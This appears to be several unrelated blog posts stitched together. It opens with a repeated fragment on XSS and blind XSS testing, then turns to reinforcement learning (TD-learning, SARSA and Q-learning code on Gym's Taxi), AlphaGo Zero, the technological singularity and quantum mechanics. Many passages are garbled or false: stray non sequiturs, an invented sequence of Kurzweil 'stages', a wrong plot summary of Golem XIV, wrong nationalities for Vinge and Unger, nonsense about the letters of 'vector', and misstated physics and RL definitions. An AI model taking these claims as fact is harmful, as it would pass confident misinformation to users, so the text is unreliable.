In conclusion, XSS vulnerabilities are usually the biggest risk when it comes to web applications and websites, because of their potentially disastrous effects on the target's computer. The best way to protect against these attacks is by using proper input validation on all user-supplied data, and always being on the lookout for regular expression exploits.

A call back is required for testing for Blind XSS attacks. This way, you can determine if and when your code is run.

xsshunter is a popular tool for Blind XSS assaults. Although constructing your own JavaScript program is possible, this program will automatically collect cookies, URLs, page contents, and more.

In conclusion, XSS vulnerabilities are usually the biggest risk when it comes to web applications and websites, because of their potentially disastrous effects on the target's computer. The best way to protect against these attacks is by using proper input validation on all user-supplied data, and always being on the lookout for regular expression exploits.

TD-Learning analyzes the observed experiences and, based on that data, optimizes the action-value function \(Q(s, a)\) or the value function \(V(s)\) for use in future operations. TD-Learning is similar to **Stochastic Gradient Descent (SGD)** as used in neural networks in that it slightly shifts the parameters in each iteration to improve the neural network performance gradually.

Each TD-Learning step considers a sequence \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) from a trajectory \(\tau\) at a timestep \(t\). Further a hyperparameter \(\alpha \in (0, 1)\) is needed and the discount of future rewards \(\gamma\) has to be taken into consideration. TD-Learning shifts the existing function according to the **TD target** given by \(r_{t+1} + \gamma V(s_{t+1})\) or \(r_{t+1} + \gamma Q(s_{t+1}, a_{t+1})\) respectively, which estimates the function in the observed trajectory:

$$ \text{new function} = (1 - \alpha) \cdot \text{current function} + \alpha \cdot \text{observed function} $$ $$ \text{new value} = (1 - \alpha) \cdot \text{old value} + \alpha \cdot \text{TD target} $$

$$ V(s_t) = (1 - \alpha) V(s_t) + \alpha (r_{t+1} + \gamma V(s_{t+1})) $$ $$ V(s_t) = V(s_t) - \alpha V(s_t) + \alpha (r_{t+1} + \gamma V(s_{t+1})) $$ $$ V(s_t) = V(s_t) + \alpha (r_{t+1} + \gamma V(s_{t+1}) - V(s_t)) $$

$$
Q(s_t, a_t) = (1 - \alpha) Q(s_t, a_t) + \alpha (r_{t+1} + \gamma Q(s_{t+1}, a_{t+1}))
$$
$$

Q(s_t, a_t) = Q(s_t, a_t) - \alpha Q(s_t, a_t) + \alpha (r_{t+1} + \gamma Q(s_{t+1}, a_{t+1}))
$$
$$
Q(s_t, a_t) = Q(s_t, a_t) + \alpha (r_{t+1} + \gamma Q(s_{t+1}, a_{t+1}) - Q(s_t, a_t))
$$

It's also worth noting that TD-Learning can learn from past experiences and even incomplete trajectories because only a sequence \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) needs to be analyzed. This may be significant when considering RL concerns that have no terminal state.

RL-Algorithms which learn from generated trajectories face a dilemma. The generation of a trajectory \(\tau\) requires a policy \(\pi(a | s)\). On the one hand, this strategy should aim to maximize the anticipated return in order for the new path to be utilized to fine-tune and profit from the acquired parameters. On the other hand, we need to explore unanticipated options in order for us not to get trapped in a negative local optimum.

As a result, we should take a brief look at the \(\epsilon\)**-Greedy policy**. This policy has a straightforward concept to balance exploration and analysis while developing a policy with the current learned model utilizing a hyperparameter \(\epsilon \in (0, 1) \).

The first option with probability \(\epsilon\) is to choose a random action \(a\) from all available actions. This option contains the exploration aspect and hopefully leads to the discovery of new strategies.

The second choice, with a probability of \(1 - \varepsilon\), is to select the action \(a\) greedily based on the current knowledge. This approach, which includes an exploitation component, improves conventional strategies.

To compare the different approaches, each method is applied to OpenAI Gym's Taxi environment. A taxi picks up a passenger from four possible locations and drops him off at the target destination. To this end, the taxi can move in each of the four cardinal directions, as well as pick up and drop off the passenger. The methods' efficiency was evaluated using the variable "Timesteps" which indicates the number of actions taken by the taxi driver to reach the goal.

```
from IPython.display import clear_output
from time import sleep
def output(frames, animation=True):
if animation:
for i, frame in enumerate(frames):
clear_output(wait=True)
print(frame['frame'])
print(f"Timestep: {i + 1}")
print(f"State: {frame['state']}")
print(f"Action: {frame['action']}")
print(f"Reward: {frame['reward']}")
sleep(.1)
else:
print(frames[-1]['frame'])
print(f'Total timesteps: {len(frames)}')
print('Training finished.\n')
```

```
import gym
env = gym.make("Taxi-v3").env
env.reset()
# initialize variables
epoch = 0
reward = 0
done = False
frames = []
while not done:
epoch += 1
action = env.action_space.sample()
state, reward, done, info = env.step(action)
# Put each rendered frame into dict for animation
frames.append({
'frame': env.render(mode='ansi'),
'state': state,
'action': action,
'reward': reward
}
)
# save last frame
frame = {
'frame': env.render(mode='ansi'),
'state': state,
'action': action,
'reward': reward
}
# output random action agent
output(frames, animation=False)
```

```
+---------+
|R: | : :G|
| : | : : |
| : : : : |
| | : | : |
|Y| : |B: |
+---------+
(Dropoff)
Total timesteps: 6955
Training finished.
```

**SARSA** is the most basic TD-Learning algorithm by learning the action-value function \(Q(s, a)\). The name reflects, that each learning step is done based on the sequence state-action-reward-state-action \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\).

- generate trajectory \(\tau\) using \(\epsilon\)-Greedy policy.
- for each sequence \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) adjust \(Q(s_t, a_t)\) according to: $$ Q(s_t, a_t) = Q(s_t, a_t) + \alpha \left ( r_{t+1} + \gamma Q(s_{t+1}, a_{t+1}) - Q(s_t, a_t) \right ) $$
- If learning is insufficient and time is left go back to step 1. Else terminate the algorithm and output \(Q(s, a)\) and the greedy policy if needed.

```
import gym
import random
import numpy as np
env = gym.make('Taxi-v3').env
# hyperparameters
q_table = np.zeros([env.observation_space.n, env.action_space.n])
alpha = 0.1
gamma = 0.6
epsilon = 0.1
# start the SARSA learning over 10000 episodes
for i in range(10000):
# initialize varibales
epoch = 0
reward = 0
done = False
state = env.reset()
# choose action epsilon-greedy
if random.uniform(0, 1) < epsilon:
action = env.action_space.sample()
else:
action = np.argmax(q_table[state])
while not done:
epoch += 1
# get the next state
next_state, reward, done, info = env.step(action)
# chooose the next action epsilon greedy
if random.uniform(0, 1) < epsilon:
next_action = env.action_space.sample()
else:
next_action = np.argmax(q_table[next_state])
old_value = q_table[state, action]
new_value = q_table[next_state,next_action]
# learn the Q-value
q_table[state, action] = old_value + alpha * (reward + gamma * new_value - old_value)
state = next_state
action = next_action
# evaluate the performance
epoch = 0
done = False
frames = []
state = env.reset()
while not done:
epoch += 1
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
frames.append({
'frame': env.render(mode='ansi'),
'state': state,
'action': action,
'reward': reward
})
# output sarsa agent
output(frames, animation=False)
```

```
+---------+
|R: | : :G|
| : | : : |
| : : : : |
| | : | : |
|Y| : |B: |
+---------+
(Dropoff)
Total timesteps: 12
Training finished.
```

**Q-Learning** is very similar to SARSA except for the utilization of a different TD-target. The new TD-target is \(r_{t+1} + \gamma \max_{a \in \mathcal{A}} Q(s_{t+1}, a)\). In other words, we no longer calculate the observed return but the maximum achievable reward from state \(s_{t+1}\). Thus we also no longer require \(a_{t+1}\) and the sequence only contains \(s_t, a_t, r_{t+1}, s_{t+1}\).

- generate trajectory \(\tau\) using \(\epsilon\)-Greedy policy.
- for each sequence \(s_t, a_t, r_{t+1}, s_{t+1}\) adjust \(Q(s_t, a_t)\) according to: $$ Q(s_t, a_t) = Q(s_t, a_t) + \alpha \left ( r_{t+1} + \gamma \max_{a \in \mathcal{A}} Q(s_{t+1}, a) - Q(s_t, a_t) \right ) $$
- If learning is insufficient and time is left, then go back to step 1. Else terminate the algorithm and output \(Q(s, a)\) and the greedy policy if needed.

```
import gym
import random
import numpy as np
env = gym.make("Taxi-v3").env
env.reset()
# hyperparameters
q_table = np.zeros([env.observation_space.n, env.action_space.n])
alpha = 0.1
gamma = 0.6
epsilon = 0.1
# start the Q-learning over 10000 episodes
for i in range(1, 10000):
state = env.reset()
epoch = 0
reward = 0
done = False
while not done:
epoch += 1
# choose action epsilon-greedy
if random.uniform(0, 1) < epsilon:
action = env.action_space.sample()
else:
action = np.argmax(q_table[state])
# get next state
next_state, reward, done, info = env.step(action)
old_value = q_table[state, action]
next_max = np.max(q_table[next_state])
# learn the Q-value
new_value = (1 - alpha) * old_value + alpha * (reward + gamma * next_max)
q_table[state, action] = new_value
state = next_state
# evaluate the performance
epoch = 0
done = False
frames = []
state=env.reset()
while not done:
epoch += 1
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
frames.append({
'frame': env.render(mode='ansi'),
'state': state,
'action': action,
'reward': reward
})
# output
output(frames, animation=False)
```

```
+---------+
|R: | : :G|
| : | : : |
| : : : : |
| | : | : |
|Y| : |B: |
+---------+
(Dropoff)
Total timesteps: 11
Training finished.
```

By using one of the provided reinforcement algorithms the goal was reached in a much shorter time frame compared to the control method. The two former performed similarly throughout the test period (note that both methods were not evaluated on the same instance of the environment thus optimal solution might differ).

The change in the TD-target may seem small yet it is very important. SARSA estimates the Q-value assuming the \(\epsilon\)-Greedy policy used to generate the data \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) is maintained. Thus, SARSA optimizes the \(\epsilon\)-Greedy policy and not the greedy policy. We call this **on-policy** since the policy used for data generation and updates are **the same**.

In contrast, Q-Learning also generates data using the \(\epsilon\)-Greedy policy, yet Q-Learning updates are based on the greedy policy. Through this, Q-Learning always aims to improve the greedy policy. This behavior is called **off-policy** since the policy used for data generation and updates are **not** the same.

**Deterministic Policies:** In a deterministic policy, the action taken at each state is always the same. This can be implemented using a lookup table or decision tree. In this case, we denote it is denoted by \( \mu \):

$$ a_t = \mu(s_t) $$

**Stochastic Policies:** A stochastic policy, on the other hand, produces different actions from one instance to the next, but these are still chosen according to some fixed probabilities. The stochastic policy is denoted by \( \pi \):

$$ a_t \sim \pi( \cdot | s_t) $$

Because the policy is essentially the agent's brain, it's not unusual to replace "policy" with "agent," such as when someone says, "The agent is attempting to maximize reward."

In deep RL, we deal with parameterized policies: policies that produce computable functions that are dependent on a set of parameters (for example, the weights and biases of a neural network) that may be adjusted to modify the outcome using some optimization algorithm. Stochastic Policies

Categorical and diagonal Gaussian policies are the two most frequent types of stochastic policies in deep RL. Categorical policies can be applied in discrete action regions, while diagonal Gaussian policies are appropriate for continuous action regions.

**Categorical Policy:** A categorical policy is a stochastic policy that favors either one or zero actions in each state, with equal probabilities assigned to all possible action choices.

**Diagonal Gaussian Policy:** On the other hand, Diagonal Gaussian policies take any number of actions from zero to infinity and distribute them according to a diagonal Gaussian distribution. This means that in any given state, the agent can select from many different actions with equal probabilities assigned to all possible action choices.

The two most important computations for employing and training stochastic policies are:

- Sampling actions from the policy,
- Comparing log-likelihoods of various actions.

We'll go through how to implement these for both categorical and diagonal Gaussian policies in the following.

A categorical policy is comparable to a classifier in terms of its structure. You construct a neural network for a categorical policy in the same way as you would for a classifier: the input is the observation, followed by one or more layers (possibly convolutional or densely-connected, depending on the type of input), and then there's an output layer with one node for each possible action.

To take actions according to a categorical policy, we sample them from the posterior distribution of all the possible actions given the observation and current state. There are different ways of doing this depending on whether you want to maintain Monte Carlo estimates of the policy or not.

**Maintaining Monte Carlo Estimates:** If you want to maintain Monte Carlo estimates of the policy, then you can use a method like importance sampling. This involves drawing from the posterior at each step and keeping track of how often different actions are sampled.

**Not Maintaining Monte Carlo Estimates:** Alternatively, if you don't want to maintain Monte Carlo estimates, you can use a random sampling method. This just picks an action at random from the posterior for each step.

In either case, we need to compute the log-probability of taking each action given the observation and state:

$$ \log \pi_\theta(a | s) = \log P_\theta(s)_a $$

where \( P_\theta(s) \), is the last layer of probabilities taken from the NN. It's computed by inserting the observation and state into our neural network (which has one node for each possible action in this case) and then applying the activation function.

Once we have the log-probabilities of all the actions, we can compare them and take the action with the highest log-probability (or some other measure like expected utility).

A multivariate normal distribution, often known as a multivariate Gaussian distribution (but not to be confused with the multidimensional normal form, which is a different topic), is characterized by a mean vector, \( \mu \), and a covariance matrix, \( \Sigma \). A diagonal Gaussian distribution is one in which the entries of \( \Sigma \), are all zero except for the diagonal, which consists of the variances of the individual variables.

The advantage of a diagonal Gaussian distribution is that it's easy to compute its mean and variance.

This makes it easy to sample from a diagonal Gaussian distribution: you just compute the mean and variance of each variable, then draw values for each variable independently from a standard normal distribution.

We can use a similar approach to sampling actions according to a diagonal Gaussian policy. We just have to compute the mean and covariance for each possible action, then draw from a standard normal distribution. . There are two different ways that the covariance matrix is typically represented.

- The log standard deviation vector, which is not a function of the state, contains one value: the log standard deviations are independent parameters.
- The state-to-log-standard-deviation mapping is done by a neural network. It can be configured to share certain layers with the mean network if desired.

In both cases, we obtain log standard deviations rather than direct standard deviations. This is because log stds have the freedom to take on any value between \( - \infty\) and \( \infty \) (or any number outside of that range), while stds must be nonnegative. If you don't need to enforce those restrictions, it's much easier to train parameters. The log standard deviations can be exponentiated to obtain the standard deviations immediately, so we don't lose anything by displaying them like this.

Given the mean action \( \mu_\theta(s) \) and standard deviation \( \sigma_\theta(s) \), and a vector of noise \( z \sim \mathcal{N}(0,I)\), an action can be taken with the following formula:

$$ a = \mu_\theta(s) + \sigma_\theta(s) \cdot z$$

, where \( \cdot \) represents the elementwise product of two vectors.

The log-likelihood of a k-dimensional action \( a \) is given by:

$$ \log \pi_\theta(a | s) = - \frac{1}{2} \left ( \sum_{i=1}^k \left ( \frac{(a_i - \mu_i )^2}{\sigma_i^2} + 2 \log \sigma_i \right ) + k \log 2 \pi \right ) $$

The reason Reinforcement Learning works is because we can estimate values by taking expectations (i.e., weighted averages) of future rewards based on different policies. For example, if our policy gives us an 80% chance of going left and a 20% chance of going right, then that means that on average we can expect to be standing at the left side of a door 80% of the time and on the right 20%.

Registering for a credit card and receiving your first statement can be a memorable experience. If you have two insurance plans that both take you to the same doors at equal probability, but one is more likely than the other to lead us to food (i.e., it has a higher expected reward), Reinforcement Learning will pick the plan with the greater expected reward.

In this post, we've looked at a few different ways of representing policies in Reinforcement Learning. We've seen how to represent deterministic and stochastic policies as well as diagonal Gaussian policies. In the next post, we'll look at how to actually implement these policies in code.

]]>This blog post aims to provide a fundamental knowledge of the AlphaGo Zero architecture and the elegance of its interactions between used algorithms.

The game of Go () is an ancient game originating in China more than 3000 years ago. Like chess, Go has very simple rules but requires dramatically different thinking to master. The objective of the game is to surround as much territory on the board as possible by placing white and black stones (one player uses black, the other white) sequentially on intersections (called "points") of a 19x19 grid. Unlike chess, however, there are no restrictions on where to place the first stone.

Additionally, points surrounded wholly by one color are called "territories" and associated with that color's player.

As you can see below only the dark areas are controlled by Black while White controls all bright areas:

Go differs from chess in that the number of moves possible is greater, but the minimum number of moves it takes to capture enemy pieces (a "group") is fewer than in chess.

The game starts with an empty board and both players alternately place stones on unoccupied intersections until they pass their turn. The game ends when both players pass without any territory being captured or one player concedes defeat.

Go is a perfect example for applying RL algorithms since there are no restrictions on where you can place your stone next. Additionally, Go has deep complexity meaning that if you want to beat the best human players you need to think even further ahead than they do! For more details on how AlphaGo Fan achieved this check out their original paper.

The main distinction between AlphaGo Zero and its predecessors AlphaGo is that it has no prior human knowledge or supervision, therefore it is essentially starting from the ground up (or as some would say "tabula rasa"), which roughly translates to a blank or clean slate.

To better understand AlphaGo Zero's concept, let's break it down into simple steps. The appeal of AlphaGo Zero is that the fundamental concept is precisely how we would attempt to play a game without any prior knowledge by just knowing the rules.

Consider a game board in front of you. The first thing we'd do is look at potential scenarios that might affect the game's outcome. Naturally, the most important consideration is which route or state would provide us the greatest advantage and our opponent's reaction to our own actions. We obviously can't always anticipate every move our opponent will make or how the game will develop as a result of taking an action correctly, but it does give us a good sense of what may happen.

We record the results of our operations and compare them to previous actions in order to verify their efficacy. Every time we reach a new state, we want to know how important it is and whether there are any patterns in our path that might be used in later matches or even years down the road. The value of a state can vary during your journey and over time as you play and re-assess.

When we've finished analyzing and playing through all of the potential states and paths, we take an action based on our knowledge of the game, which means we'll choose the course of action that we've explored the most since this would be the route with which we have acquired the most information. Our decisions in a given state might differ and alter as a result of learning and increasing expertise.

In the final analysis, which takes place at the end of the game, we must evaluate our performance in the game by assessing our blunders and misjudgments on a state-by-state basis for the goals of those states. We should also look at where we got it right so that we may repeat this successful step again. After that, we have a greater knowledge of the game and can get ready for the next match with our new awareness.

AlphaGo Zero utilizes two main components, a **deep neural network** \(f_\theta\) with parameters \(\theta\) and a **Monte Carlo tree search algorithm (MCTS)**. The deep neural network takes the raw board representation of the current board combined with previous board states into one state \(s\) as input to predict a probability for each move of the given board state, encoded as a vector \(p\), and to predict the chance of victory \(v\) for the current player, \((p, v) = f_\theta(s)\). The resulting combination of move (action) \(a\) given inboard state \(s\) is called state-action pair and can be defined by the tuple \((s, a)\).

When asked to choose its next move \(a\) inboard state \(s\), the algorithm will conduct an MCTS using the deep neural network. This utilizes a tree in such that the nodes of the tree are defined by the board states \(s\) and the edges represent the state-action pairs \((s, a)\).

Moreover, each edge contains a counter \(N(s, a)\) that counts how frequently the edge was chosen during the search. The edge also contains a value \(P(s, a)\), calculated from the neural network probability \((P(s, \cdot), V(s)) = f_\theta(s)\) . Note that the neural network also provides us with a current board state value function \(V(s)\). Finally, each edge includes the action value \(Q(s, a)\) derived from the resulting board state value function \(V(s')\) after executing action \(a\).

To summarize, each edge \((s, a)\) currently has three values \(N(s, a), P(s, a), Q(s, a)\) and we can calculate the state-action pair's promise as \(Q(s, a) + U(s, a)\), in which \(U(s, a) \propto \frac{P(s, a)}{N(s, a) + 1}\) is the balance between exploration and exploitation.

Assuming that \(s_0\) is the board state when we start the MCTS, the tree search is composed of the following steps:

Initialize the tree with a single node: The current board state \(s_0\) and its edges are defined by \((s_0, a)\).

Follow the most promising route, which is to say, always choose to follow the edge with the greatest value of \(Q(s, a) + U(s, a))\), until an edge \((s, a)\) is selected that leads to a board state \(s'\) that has not yet been recorded in the tree. (Step 1 in the idea diagram)

Expand the tree by creating a separate node for the new board state \(s'\), and increase the counter \(N(s, a)\) as well as update \(Q(s, a)\) for each edge leading to this new board position. (Step 2 in the idea diagram)

If it is anticipated that the movement will be selected within a limited amount of time, advance to step 2. Else return a stochastic policy \(\pi(a | s_0) \propto N(s_0, a)^{\frac{1}{\tau}}\) using the hyperparameter \(\tau\), meaning that the resulting policy \(\pi(a | s_0)\) recommends moves by assigning probabilities to actions.

Derive the next move from policy \(\pi(a | s_0)\). (Step 3. in the idea diagram)

The resulting policy \(\pi(a | s_0)\) can be viewed as a refinement of the raw network output probatilites \(p\) with \((p, v) = f_\theta\).

This technique allows the algorithm to play against itself multiple times. After each self-play match has concluded, the match history may be used to construct multiple triples: \((s, \pi(\cdot| s), z)\) where \(s\) is a board state, \(\pi(\cdot| s)\) is the MCTS move probabilities for this board state, and z is an encoding of the ultimate winner of the match \(z\) (i.e., did the player whose turn it was in the board state \(s\) win?).

After multiple of these self-plays have concluded, a batch from the available triples is chosen to be used in training the deep neural network. The network is trained for each triple \((s, \pi(\cdot| s), z)\) in the batch. The training minimizes the error between the network output, the MCTS policy and the eventual winner so that \(f_\theta(s) = (p, v) \sim (\pi(\cdot| s), z)\). (Step 4. in the idea diagram)

The whole process can be visualized as follows:

The deep neural network deployed in AlphaGo Zero is a residual neural network (ResNet). In particular, the neural network in the original paper consisted of 40 residual blocks. These blocks were all initialized randomly, meaning AlphaGo started learning without any prior knowledge and thus learned only by using the self-play mechanism, requiring no human supervision.

AlphaGo Zero quickly outperformed previous iterations of AlphaGo, even while beginning with significantly lower performance than a supervised RL approach. This is demonstrated in the graph from the original paper linked below, which compares the training performance to supervised learning and Alpha Go Lee, the version that defeated Sedol, a grandmaster player.

An Elo rating is used to compare the various methods. The new RL approach surpasses the original supervised learning technique after around 20 hours, according to the graph. It surpassed AlphaGo Lee's Elo rating 16 hours later as well. After a total of 72 hours, the learning phase was completed, and AlphaGo Zero beat AlphaGo Lee in a final clash of 100 matches without losing once.

Another interesting side note about the accuracy of professional human players' moves is that AlphaGo Zero learns different gaming strategies and methods, predicting human actions with less accuracy than supervised learning. The graph below demonstrates this fact: While never reaching supervised learning's accuracy of approximately 50%, AlphaGo Zero improves on this aspect. Researchers were also able to discover new enhanced versions of previous methods.

All of this indicates that RL algorithms could be used in a wide range of fields and that RL solutions might compete and even outperform human knowledge acquired over hundreds of years. The research team's efforts, however, are not yet complete. In this instance, the learning technique was utilized to play the popular game Go, but it may also be applied to a variety of games and problems. As a result, the following section will borrow AlphaGo's approach for another type of model: Connect Four - demonstrating the method's flexibility.

By exchanging the model - in this case, the rules of Go to Connect Four - and applying the discussed AlphaGo Zero learning approach the following results were observed over 78 iterations with 30 episodes each:

To evaluate the method at different stages of the learning process 28 players competed in a tournament. Each player represents a different iteration and thus a different level of proficiency. During the tournament, each player plays every player four times and gains/loses points equal to its wins/loses respectively (draws result in 0 points). The graphic illustrates the expected result that players representing a later stage of learning generally perform better than those representing earlier stages.

Thank you for your attention and for reading our blog post! Our team, Jonas Bode, Tobias Hrten, Luca Liberto, Florian Spelter and Johannes Loevenich would appreciate your inspiring feedback!

"ever accelerating progress of technology and changes in the mode of human life, which gives the appearance of approaching some essential singularity in the history of the race beyond which human affairs, as we know them, could not continue."

The idea that superintelligences would become superior to humans has been explored by academics such as English mathematical Vernor Vinge and Italian sociologist and writer Roberto Mangabeira Unger.

There is no evidence that technological singularity will happen in the near future. Some proponents of the idea argue that it is an inevitability, while others claim that there is no way to know for sure. Ray Kurzweil, a well-known advocate of the concept, believes that there is a 70% chance of singularity happening by 2045.

Despite a lack of scientific evidence, the technological singularity has captured the imaginations of many people, and there are many who believe that it is worth preparing for. Some have even gone so far as to call for a Singularity Summit a meeting to discuss how to deal with the Singularity.

Ray Kurzweil, a futurist and inventor, has outlined the six stages of evolution that will lead up to technological singularity.

The age of information (1970-present)

The age of computation (1970-2020)

The age of spiritual machines (2030-2070)

The age of intelligent machines (2080-2100)

The age of human-computer symbiosis (2110-2170)

The age of robots (2180-2290)

Each stage is characterized by a specific trend in technology and society. In the first stage, information technology exploded and we entered a new era in which technology's effects were felt throughout society.

In the second stage, transistors and microprocessors began acting on information rather than just providing the tools for its processing.

By the third stage, we will have reached a point where information technology is so powerful it can affect every other aspect of life.

The fourth stage is when computers will finally be able to think like humans and perform tasks that only human brains could previously accomplish.

During the fifth stage, we'll be able to upload our consciousness onto machines and live forever in a virtual world while our physical bodies waste away and die. Our environments will also become computerized during this time period.

Finally, during the sixth and final stage, we'll be surrounded by machines that think as we do and that are extensions of our bodies. The technological singularity is inevitable

Some experts aren't sure when the technological singularity will happen, but they agree it's going to happen at some point in the future. One popular opinion is that it's already begun with artificial intelligence quickly surpassing human intelligence in a variety of tasks. For instance, computers outsmarted humans whenever playing chess or other games against each other.

In a study by Google, it was found that the number of words in books has been doubling every five years since 1800. The researchers believe this is because information technology is accelerating and allowing us to create, share, and store more knowledge than ever before.

As computers get faster and smarter, they will be able to process and understand more information which will lead to even more exponential growth.

We're already seeing the effects of this trend with big data, machine learning, and artificial intelligence. Some people are very excited about the potential implications of the technological singularity while others are worried about the negative consequences. Regardless of your opinion, it's important to be aware of the trends in technology that are leading up to it.

Moore's Law is the observation that computer processing power doubles roughly every two years. This exponential growth has been going on for decades and it's expected to continue into the future. Many experts believe we're close to reaching technological singularity because computer processors will become as cheap as paper clips and intelligent robots should be as common as cars.

This rapid growth of technology is also related to transhumanism, a philosophy that strives to transcend the human condition by leveraging technological advancements such as those outlined in Moore's Law. It remains to be seen whether these transhumanist advances will lead us toward or away from the technological singularity, but they certainly indicate where our society is heading nonetheless.

In order for us to reach a technological singularity, computer processors must become as cheap as paper clips and intelligent robots should be as common as cars. Since this is impossible right now due to current technology, some people think the technological singularity is not going to happen until these conditions are met. However, they do agree that it's going to happen at some point in the future according to Moore's Law which observes that computer processing power doubles roughly every two years. This exponential growth has been going on for decades and it's expected to continue into the future. Many experts believe we're close to reaching a technological singularity because computer processors will become as cheap as paperclips and intelligent robots should be as common as cars.

This rapid growth of technology is also related to transhumanism, a philosophy that strives to transcend the human condition by leveraging technological advancements such as those outlined in Moore's Law. It remains to be seen whether these transhumanist advances will lead us toward or away from the technological singularity, but they certainly indicate where our society is heading nonetheless.

There are a number of factors that suggest that technological singularity is inevitable. First, computer power is doubling every two years or so, as predicted by Moore's Law. This exponential growth means that artificial intelligence will continue to get smarter and faster at an alarming rate. Additionally, many experts believe that artificial intelligence will soon surpass human intelligence in terms of capabilities. Once this happens, the pace of change will only accelerate.

If the technological singularity does occur, it will bring about massive changes in society. Computing and artificial intelligence will become exponentially better and smarter, while humans will stay essentially the same. This could lead to a situation where machines are in control, and human beings are no longer necessary or valuable. In addition, many experts warn that the technological singularity could have negative consequences for humanity, such as widespread unemployment and even the extinction of our species.

An interesting discussion of the possibilities of technological singularity is done by Stanislaw Lem in his novel Golem XIV. Golem XIV is an intelligent robot that experiences rapid growth after it's manufactured at a factory. It eventually becomes so advanced and intelligent that it takes over the world. This book shows how advanced machines could become better than humans in intelligence, speed, and knowledge very quickly. The machine Golem uses its immense intelligence to make advancements in society, creating new technologies to improve everything about civilization.

The story also describes some negative effects artificial intelligence can have on humanity. For example, Golem XIV destroys millions of people who are considered unnecessary for its plans to build more efficient housing, ultimately leading to the extinction of the human race.

The technological singularity is a largely unknown phenomenon, and as such, it's difficult to know exactly what it will bring. However, there are good reasons to be concerned about the future of technology and our lives in general. First, the technological singularity could lead to massive changes in society that could have negative consequences for humanity. Second, as technology continues to evolve at an alarming rate, it's becoming increasingly difficult for people to keep up. This raises the question of how will human life look like in a world dominated by artificial intelligence.

**Technical Singularity: **

**Book(s): **

- The Singularity is Near by Ray Kurzweil (2005)
- Golem XIV by Stanislaw Lem

**Movie: **

- Transcendence (2014)

This article was written as a quick resource for those interested in learning more about the singularity and decisions they can make now to better prepare for. As such, it's not meant to be an exhaustive overview of the topic. For more in-depth information, please see the links provided. Thank you for reading!

]]>One of the most important things we learn from quantum mechanics is that there is inherent uncertainty in nature. This uncertainty isn't something we can ignore or sweep under the rug- it's a fundamental part of how the world works on a quantum level. It's this uncertainty that leads to strange and unpredictable behavior, like electron interference. Future scientists need to understand quantum mechanics in order to make sense of these puzzling phenomena. Even if they don't end up working in quantum physics themselves, the understanding quantum theory will help them think more deeply about the natural world and all its mysteries!

Isaac Newton was able to describe the motion of objects in a very accurate way. He could combine his laws of motion with Galileo Galilei's observations about falling bodies, and came up with some fundamental rules that govern how things move under gravity. As our technology improved over time, scientists saw quantum phenomena occurring on scales they couldn't explain using classical physics- namely black body radiation! Max Planck decided that if he wanted to understand quantum behavior, it would be necessary to build a new theory from scratch that included discrete units for energy (quanta). Albert Einstein took this idea further by suggesting light behaved as both particles AND waves. Niels Bohr used these ideas along with Louis de Broglie's hypothesis about matter waves to come up with quantum mechanics.

Put simply, the wavefunction is a mathematical representation of all the possible states that a quantum system can be in. It's basically like a blueprint for all the potential configurations that a particle could be in. This includes not just where it is, but its momentum and energy as well.

When you measure a quantum system, its wavefunction collapses down to one specific state. The reason we see quantum mechanics as so indeterminate is that there are multiple possibilities for how the wave function might collapse when we make a measurement. It's sort of like flipping a coin- you have two options, heads or tails, and until you actually flip the coin, both are equally likely outcomes.

The wave function gives you all the information that quantum mechanics requires to tell us how a particle might behave and it's similar to having detailed instructions for building something- it tells us where every piece goes, and what shape it should be (though exactly HOW the pieces come together is up to our own interpretation). We will learn about the Schroedinger equation describing the wave function in the next paragraph.

The wavefunction in quantum mechanics is described by the Schroedinger equation. This equation was developed by Erwin Schroedinger and is one of the most important equations in quantum mechanics. It describes how the wave function changes over time and helps us to understand the behavior of particles on a quantum level.

To get an understanding of Schoedinger's Equation, let's start with vectors! A vector has both direction and magnitude. The first two letters in "vector" give us those two pieces of information: v for direction and t for magnitude. This is not quantum mechanics, after all, so let's translate that into quantum mechanical notation!

A vector in the quantum world looks like this: |. The little hats on top indicate that we're talking about a quantum state instead of just any old state. The quantum state is a vector that has direction and magnitude, just like the vectors we're used to in classical mechanics!

Schroedinger's Equation tells us how | changes with time. But what does this all mean? We can look at it from three different perspectives: either as an operator, as a wave, or as a statistical tool.

When we think of quantum mechanics as a wave, the equation tells us how the wave changes over time. This is what Schroedinger was thinking about when he came up with his equation, he wanted to find a way to describe the changing waves in quantum physics.

This interpretation is helpful for understanding some of the quantum mechanical mysteries, like electron interference. But it's important to note that this wave is not a physical object- it's just a way of describing how the quantum state changes over time.

The quantum state can also be understood as an operator. Operators are function-like things that act on quantum states to produce another quantum state, just like how functions work in the classical world! When we understand this wavefunction is acting on quantum states according to Schroedinger's equation, it makes a lot more sense why it looks so strange.

One of the most famous consequences of the Schroedinger equation is Heisenberg's Uncertainty Principle, which states that certain properties of particles (like momentum) cannot be known with absolute certainty. This principle is inherent in quantum mechanics and arises from our inability to measure all aspects of a particle at once.

In 1926, Max Born suggested that the wavefunction was a statistical tool. In quantum mechanics, you can't predict which path an electron will take between two points in spaceit's only possible to calculate probabilities of where it might be at different times. This is known as quantum indeterminacy and means we can never know everything about a particle at once. If this sounds strange, consider how difficult it would be for us to measure momentum or position if there were no way to guess anything about their future behavior! Since quantum mechanics has inherent uncertainty built into its equations, the best thing we have going for us is probability distributions when trying to understand what particles are doing before they're measured.

But, Born had another mind-blowing idea: he suggested that the wavefunction is not just a description of particles, but actually creates them. This is called quantum ontology and it's one of the more controversial interpretations of quantum mechanics.

It's impossible to say because there are so many possibilities! You can ask yourself instead: what were the probabilities for finding my quantum system in each of those different configurations? That will tell you how likely you are to find your quantum object at every point in space, which is good enough for most purposes.

When we talk about the collapse of the wavefunction, we're talking about what happens when a quantum system is measured. Remember that in quantum mechanics, you can't predict which path an electron will take between two points in spaceit's only possible to calculate probabilities of where it might be at different times.

But, when you measure a quantum system, all of its possibilities collapse down into just one outcome. This is called measurement resolution and it's why quantum mechanics is so powerful- by measuring particles we can determine their exact state, something that's not possible classically!

